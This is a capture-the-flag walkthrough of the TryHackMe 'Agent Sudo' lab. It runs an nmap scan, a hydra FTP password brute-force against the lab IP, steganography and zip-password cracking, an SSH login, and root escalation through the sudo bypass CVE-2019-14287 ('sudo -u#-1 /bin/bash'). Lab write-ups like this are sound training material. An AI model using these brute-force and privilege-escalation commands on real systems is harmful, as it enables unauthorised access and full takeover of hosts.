# CTF TryHackMe - Agent Sudo

## Nmap

```bash
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ef:1f:5d:04:d4:77:95:06:60:72:ec:f0:58:f2:cc:07 (RSA)
|   256 5e:02:d1:9a:c4:e7:43:06:62:c1:9e:25:84:8a:e7:ea (ECDSA)
|_  256 2d:00:5c:b9:fd:a8:c8:d8:80:e3:92:4f:8b:4f:18:e2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Annoucement
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## In source code on port 80

```
Attention chris, <br><br>

Do you still remember our deal? Please tell agent J about the stuff ASAP. Also, change your god damn password, is weak! <br><br>

From,<br>
Agent R 
```

## Trying to bruteforce ftp with hydra
```bash
hydra -l chris -P /usr/share/wordlist/rockyou.txt 10.10.112.107 ftp

[21][ftp] host: 10.10.112.107   login: chris   password: crystal
```

## FTP Access with the user chris

ftp://chris:crystal@10.10.112.107
// dl all files


## Using stegextract to get hidden files

```bash
stegextract cutie.png -o out
```
We got a zip file which is require a password

## Using zip2john to crack the password
```bash
zip2john out > hash.txt
john hash.txt
```

## Using steghide to extract data from jpg file
```bash
steghide extract -sf cute-alien.jpg
```
We got password ssh for james

## SSH Acces as James User
```bash
ssh james@10.10.112.107
```

## Trying to privesc 

List sudo permissions
```bash
sudo -l 
(ALL, !root) /bin/bash
```bash

We can exploit this with the **CVE 2019-14287**

```bash
sudo -u#-1 /bin/bash
```

And we'rrr root
